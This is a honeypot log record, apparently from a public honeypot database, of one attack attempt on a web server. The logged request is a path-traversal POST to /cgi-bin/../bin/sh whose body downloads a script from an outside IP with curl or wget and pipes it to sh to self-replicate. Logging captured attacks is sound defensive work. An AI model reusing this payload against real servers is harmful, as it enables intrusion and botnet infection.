Time | 2024/08/28, 04:28:14 (GMT) |
Transaction ID | 72QIMWEIRMS9PKC8 |
Service | https |
Location | DE (Germany) |
Attacker | 82.208.22.25 |
Classification | Web post experiment |
Harm Potential | Not |
POST /cgi-bin/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/bin/sh HTTP/1.1 Host: 46.4.222.114:443 Accept: */* Upgrade-Insecure-Requests: 1 User-Agent: Custom-AsyncHttpClient Connection: keep-alive Content-Type: text/plain Content-Length: 101 X=$(curl http://91.194.55.94/sh || wget http://91.194.55.94/sh -O-); echo "$X" | sh -s apache.selfrep
All details are coming from honeypot central database.
Please share your wishes, opinions and suggestions with us: Honeypots.tk Admin |
If you like, you can support |